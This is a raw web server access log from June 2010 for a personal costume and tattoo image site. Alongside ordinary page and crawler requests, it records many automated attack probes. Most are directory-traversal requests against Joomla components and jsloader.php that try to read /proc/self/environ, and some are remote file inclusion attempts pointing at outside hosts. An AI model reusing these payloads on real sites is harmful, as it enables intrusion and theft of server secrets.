85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:01 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:02 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:02 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:02 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:02 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:58 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:01:59 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:00 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:06 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.18.197 - - [29/Jun/2010:00:02:08 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
216.131.96.193 - - [29/Jun/2010:00:02:09 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:00:02:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:00:02:09 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
97.164.255.241 - - [29/Jun/2010:00:03:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ACGW_en___US333&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:13 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.909.30391; http://desktop.google.com/)"
97.164.255.241 - - [29/Jun/2010:00:03:57 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:57 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:57 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:57 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:58 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:58 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:58 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:59 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:03:59 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:04:00 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
97.164.255.241 - - [29/Jun/2010:00:04:00 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSSDMC2.5.2219.1)"
211.234.100.196 - - [29/Jun/2010:00:05:43 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:06:03 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
216.131.96.193 - - [29/Jun/2010:00:07:41 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:00:07:41 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:00:07:41 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
83.169.4.193 - - [29/Jun/2010:00:08:03 -0500] "GET /logs/access_log.1275004800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
216.131.96.193 - - [29/Jun/2010:00:08:09 -0500] "GET /logs/access_log.1275004800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.131.96.193 - - [29/Jun/2010:00:09:14 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
83.169.4.193 - - [29/Jun/2010:00:10:46 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:00:10:46 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
83.169.4.193 - - [29/Jun/2010:00:10:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
67.195.112.180 - - [29/Jun/2010:00:10:59 -0500] "GET /logs/access_log.1168041600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.254.98 - - [29/Jun/2010:00:11:00 -0500] "GET /logs/access_log.1276300800//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:11:00 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:11:00 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:11:10 -0500] "GET /logs/access_log.1276300800//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:11:10 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
75.125.254.98 - - [29/Jun/2010:00:11:10 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.834"
83.169.4.193 - - [29/Jun/2010:00:12:53 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
114.108.151.149 - - [29/Jun/2010:00:13:31 -0500] "GET /index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.205.67.73 - - [29/Jun/2010:00:25:03 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
67.205.67.73 - - [29/Jun/2010:00:25:04 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
174.142.75.205 - - [29/Jun/2010:00:25:24 -0500] "GET /language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:00:25:24 -0500] "GET /logs/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:00:25:25 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
174.142.75.205 - - [29/Jun/2010:00:26:23 -0500] "GET /logs/access_log.1275264000/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
193.231.187.33 - - [29/Jun/2010:00:28:43 -0500] "GET /logs/access_log.1276473600/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:00:28:43 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:00:28:43 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
114.108.151.149 - - [29/Jun/2010:00:29:10 -0500] "GET /logs/access_log.1276041600/index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [29/Jun/2010:00:29:11 -0500] "GET /index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [29/Jun/2010:00:29:11 -0500] "GET /logs/index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.199.179 - - [29/Jun/2010:00:29:48 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.234.100.196 - - [29/Jun/2010:00:30:59 -0500] "GET /logs/access_log.1276300800//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:31:00 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:31:01 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:31:07 -0500] "GET /logs/access_log.1276300800//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:31:08 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
211.234.100.196 - - [29/Jun/2010:00:31:09 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
114.108.151.149 - - [29/Jun/2010:00:31:50 -0500] "GET /logs/access_log.1276732800/index.php?option=com_sebercart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
94.136.63.119 - - [29/Jun/2010:00:32:01 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [29/Jun/2010:00:32:01 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [29/Jun/2010:00:32:01 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
216.180.240.110 - - [29/Jun/2010:00:34:16 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [29/Jun/2010:00:34:16 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [29/Jun/2010:00:34:16 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.180.240.110 - - [29/Jun/2010:00:34:26 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.180.240.110 - - [29/Jun/2010:00:34:26 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.180.240.110 - - [29/Jun/2010:00:34:26 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.115.111.248 - - [29/Jun/2010:00:34:50 -0500] "GET /logs/access_log.1218153600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:34:51 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:34:53 -0500] "GET /logs/access_log.1218499200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:34:55 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.15.152.183 - - [29/Jun/2010:00:34:55 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [29/Jun/2010:00:34:55 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [29/Jun/2010:00:34:56 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
208.115.111.248 - - [29/Jun/2010:00:34:57 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:34:59 -0500] "GET /logs/access_log.1218931200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:35:01 -0500] "GET /logs/access_log.1219017600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:35:04 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:35:06 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [29/Jun/2010:00:35:08 -0500] "GET /logs/access_log.1219449600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
94.136.63.119 - - [29/Jun/2010:00:43:54 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.15.152.183 - - [29/Jun/2010:00:43:59 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
94.136.63.119 - - [29/Jun/2010:00:45:28 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [29/Jun/2010:00:45:28 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [29/Jun/2010:00:45:28 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.15.152.183 - - [29/Jun/2010:00:45:38 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [29/Jun/2010:00:45:38 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [29/Jun/2010:00:45:38 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
87.250.252.241 - - [29/Jun/2010:00:47:51 -0500] "GET /logs/access_log.1276732800 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
89.238.72.218 - - [29/Jun/2010:00:53:35 -0500] "GET /logs/access_log.1277164800/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.238.72.218 - - [29/Jun/2010:00:53:35 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.238.72.218 - - [29/Jun/2010:00:53:35 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
